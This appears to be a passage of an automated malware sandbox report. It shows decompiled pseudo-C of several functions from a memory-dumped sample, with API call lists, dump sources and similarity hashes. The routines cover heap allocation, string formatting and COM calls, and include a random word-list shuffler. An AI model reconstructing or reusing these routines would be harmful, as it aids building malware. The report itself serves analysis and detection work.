                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 047F134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F1365
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 2aaf7fbfb4a4977c1afd79ad48975b976c4b3dcceb302a83bc988938c97f8e14
                                                          • Instruction ID: 314fd307205b04630e4ed34a35ff373ca41c046664e9be984379a21f64311bc2
                                                          • Opcode Fuzzy Hash: 2aaf7fbfb4a4977c1afd79ad48975b976c4b3dcceb302a83bc988938c97f8e14
                                                          • Instruction Fuzzy Hash: 9711C272A44304FFE320ABA5DC0DB9A3B98EF44364F008925FE45D6780EAB4EC008660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E047F5BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E047F6C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x47fd25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x47fd25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x47fd160(0, 2);
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E047F496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x47fd2a8; // 0xaea5a8
                                                          					if( *0x47fd25c > 5) {
                                                          						_t8 = _t26 + 0x47fe5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x47fe9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E047F729A(_t27, _t27);
                                                          					_t31 = E047F232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x47fd270 =  *0x47fd270 ^ 0x81bbe65d;
                                                          						_t32 = E047FA71F(0x60);
                                                          						 *0x47fd32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x47fd32c; // 0x52e95b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x47fd32c; // 0x52e95b0
                                                          							 *_t51 = 0x47fe81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x47fd238, 0, 0x43);
                                                          							 *0x47fd2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x47fd25c; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x47fd2a8; // 0xaea5a8
                                                          								_t13 = _t58 + 0x47fe55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x47fc287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E047F9135( ~_v8 &  *0x47fd270,  &E047FD00C); // executed
                                                          								_t54 = E047F888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E047F87AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E047F51B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E047F1C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x47fd15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E047FA273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 047F6C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,047F5BBB,00000000,00000000), ref: 047F6C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047F5C38
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • memset.NTDLL ref: 047F5C87
                                                          • RtlInitializeCriticalSection.NTDLL(052E9570), ref: 047F5C98
                                                            • Part of subcall function 047F1C66: memset.NTDLL ref: 047F1C7B
                                                            • Part of subcall function 047F1C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047F1CBD
                                                            • Part of subcall function 047F1C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 047F1CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047F5CC3
                                                          • wsprintfA.USER32 ref: 047F5CF3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: 4bc6fe54c2274f2c73958e4f82fd22da0dc862d8c58edc87f9e80cee4a9de643
                                                          • Instruction ID: b4f6435c10271336d93896c07e2a5fcc3222caeb416e7da75b9c9977af97cd34
                                                          • Opcode Fuzzy Hash: 4bc6fe54c2274f2c73958e4f82fd22da0dc862d8c58edc87f9e80cee4a9de643
                                                          • Instruction Fuzzy Hash: E951BF71A11618FBEB21ABE4DD8CFAE77A8EB04714F048525E702D7342F678B945CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E047F62DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E047FA71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E047FA734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E047FA71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x47fd278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 047F63D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 047F63EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 047F6403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 047F6427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 0f52ec8359da817e8c015a901a5d87886fecf062a755be5495cc0bc42a6066d8
                                                          • Instruction ID: 7b76033430d6c9f1049d3c8fa9ca14702cdfd9ddb2329b6775ecae40ec9eea1f
                                                          • Opcode Fuzzy Hash: 0f52ec8359da817e8c015a901a5d87886fecf062a755be5495cc0bc42a6066d8
                                                          • Instruction Fuzzy Hash: DF519B71A04218EBDF21DF99CC84AADBBB6FF45314F15806AEA159B305C770BA438B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E047F6545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0; // executed
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E047FA71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 6298900cdd7d3f23c8eb5fe4a2df43d84d0cf4de82e4eb795b06ae1ee40d9170
                                                          • Instruction ID: f335f4a404626992d60f170a1b9ba3b9d7ee5708eeae37c42177670699cf9109
                                                          • Opcode Fuzzy Hash: 6298900cdd7d3f23c8eb5fe4a2df43d84d0cf4de82e4eb795b06ae1ee40d9170
                                                          • Instruction Fuzzy Hash: 27213175900209EFDB11DFA4C98899EBBB4FF58314B108169EA05B7314EB30EA02CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F8D14(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				void* _t26;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E047FA2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t4 = _t24 + 0x47fedc0; // 0x52e9368
                                                          				_t5 = _t24 + 0x47fed68; // 0x4f0053
                                                          				_t26 = E047F5356( &_v16, _v8, _t5, _t4); // executed
                                                          				_t45 = _t26;
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t11 = _t32 + 0x47fedb4; // 0x52e935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x47fed68; // 0x4f0053
                                                          						_t52 = E047F45C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x47fd2a8; // 0xaea5a8
                                                          							_t13 = _t35 + 0x47fedfe; // 0x30314549
                                                          							if(E047F8E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x47fd25c - 6;
                                                          								if( *0x47fd25c <= 6) {
                                                          									_t42 =  *0x47fd2a8; // 0xaea5a8
                                                          									_t15 = _t42 + 0x47fec0a; // 0x52384549
                                                          									E047F8E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x47fd2a8; // 0xaea5a8
                                                          							_t17 = _t38 + 0x47fedf8; // 0x52e93a0
                                                          							_t18 = _t38 + 0x47fedd0; // 0x680043
                                                          							_t45 = E047F5D7D(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x47fd238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x47fd238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E047F4F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}



















                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052E9368,00000000,?,74B5F710,00000000,74B5F730), ref: 047F8D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052E93A0,?,00000000,30314549,00000014,004F0053,052E935C), ref: 047F8E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047F523E), ref: 047F8E12
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c4103e08c935004e8c13579af7bb0f65d8881c752ca9260917ae6c2f751721e5
                                                          • Instruction ID: ca91a09f30a8dedb5ec8966447db61ad2d84a3724ff2afd6e4e4438e9f532019
                                                          • Opcode Fuzzy Hash: c4103e08c935004e8c13579af7bb0f65d8881c752ca9260917ae6c2f751721e5
                                                          • Instruction Fuzzy Hash: 2731C032A00108BFEB21EBE4DD88EDA7BBDEF48714F054165B601A7320E374AE44DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E047FA376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				void* _v8;
                                                          				void* __edi;
                                                          				intOrPtr _t18;
                                                          				void* _t24;
                                                          				void* _t25;
                                                          				void* _t30;
                                                          				void* _t36;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          
                                                          				_t36 = __edx;
                                                          				_t32 = __ecx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t42 =  *0x47fd340; // 0x52e9a88
                                                          				_push(0x800);
                                                          				_push(0);
                                                          				_push( *0x47fd238);
                                                          				if( *0x47fd24c >= 5) {
                                                          					if(RtlAllocateHeap() == 0) {
                                                          						L6:
                                                          						_t30 = 8;
                                                          						L7:
                                                          						if(_t30 != 0) {
                                                          							L10:
                                                          							 *0x47fd24c =  *0x47fd24c + 1;
                                                          							L11:
                                                          							return _t30;
                                                          						}
                                                          						_t44 = _a4;
                                                          						_t40 = _v8;
                                                          						 *_a16 = _a4;
                                                          						 *_a20 = E047F7306(_t44, _t40);
                                                          						_t18 = E047F4A09(_t40, _t44);
                                                          						if(_t18 != 0) {
                                                          							 *_a8 = _t40;
                                                          							 *_a12 = _t18;
                                                          							if( *0x47fd24c < 5) {
                                                          								 *0x47fd24c =  *0x47fd24c & 0x00000000;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						_t30 = 0xbf;
                                                          						E047F6761();
                                                          						RtlFreeHeap( *0x47fd238, 0, _t40); // executed
                                                          						goto L10;
                                                          					}
                                                          					_t24 = E047F1F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                          					L5:
                                                          					_t30 = _t24;
                                                          					goto L7;
                                                          				}
                                                          				_t25 = RtlAllocateHeap(); // executed
                                                          				if(_t25 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_t24 = E047F4AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                                                          				goto L5;
                                                          			}













                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 047FA39A
                                                            • Part of subcall function 047F4AB6: GetTickCount.KERNEL32 ref: 047F4ACA
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B1A
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B37
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B63
                                                            • Part of subcall function 047F4AB6: HeapFree.KERNEL32(00000000,?), ref: 047F4B75
                                                            • Part of subcall function 047F4AB6: wsprintfA.USER32 ref: 047F4B96
                                                            • Part of subcall function 047F4AB6: HeapFree.KERNEL32(00000000,?), ref: 047F4BA6
                                                            • Part of subcall function 047F4AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047F4BD4
                                                            • Part of subcall function 047F4AB6: GetTickCount.KERNEL32 ref: 047F4BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 047FA3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,047F5289,?,047F5289,00000002,?,?,047F5D5E,?), ref: 047FA415
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: 595b4be901953c8eee27cd3ce9a371efe4bb52db7eb27ef57e8b0d5cca9fa883
                                                          • Instruction ID: 5c5b5f5b198a5a2dd3956d1b546914a6c78182ae47bcb2412aaad7d790dcce89
                                                          • Opcode Fuzzy Hash: 595b4be901953c8eee27cd3ce9a371efe4bb52db7eb27ef57e8b0d5cca9fa883
                                                          • Instruction Fuzzy Hash: A9211D71200219EBEB119F99DD88EEA37ACEF45354F108026FA06D7340EB74FD459BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E047F219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                          				void* _v8;
                                                          				void* __esi;
                                                          				intOrPtr* _t35;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr* _t57;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t68;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          
                                                          				_t55 = _a4;
                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                          				_a4 = 0;
                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                          				if(_t76 < 0) {
                                                          					L18:
                                                          					return _t76;
                                                          				}
                                                          				_t76 = E047F3AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
                                                          				if(_t76 >= 0) {
                                                          					_t61 = _a28;
                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                          						_t52 = _v8;
                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                          					}
                                                          					if(_t76 >= 0) {
                                                          						_t43 =  *_t55;
                                                          						_t68 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t20 = _t68 + 0x47fe1fc; // 0x740053
                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                          						if(_t76 >= 0) {
                                                          							_t76 = E047F57B4(_a4);
                                                          							if(_t76 >= 0) {
                                                          								_t65 = _a28;
                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                          									_t50 = _a4;
                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t45 = _a4;
                                                          						if(_t45 != 0) {
                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                          						}
                                                          						_t57 = __imp__#6;
                                                          						if(_a20 != 0) {
                                                          							 *_t57(_a20);
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							 *_t57(_a12);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t41 = _v8;
                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                          				goto L18;
                                                          			}





















                                                          APIs
                                                            • Part of subcall function 047F3AB0: SysAllocString.OLEAUT32(80000002), ref: 047F3B0D
                                                            • Part of subcall function 047F3AB0: SysFreeString.OLEAUT32(00000000), ref: 047F3B73
                                                          • SysFreeString.OLEAUT32(?), ref: 047F227A
                                                          • SysFreeString.OLEAUT32(047F85ED), ref: 047F2284
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 61297296b42facfcf8f5126c0071739d54becee42d04f246c2ffa66857e7198f
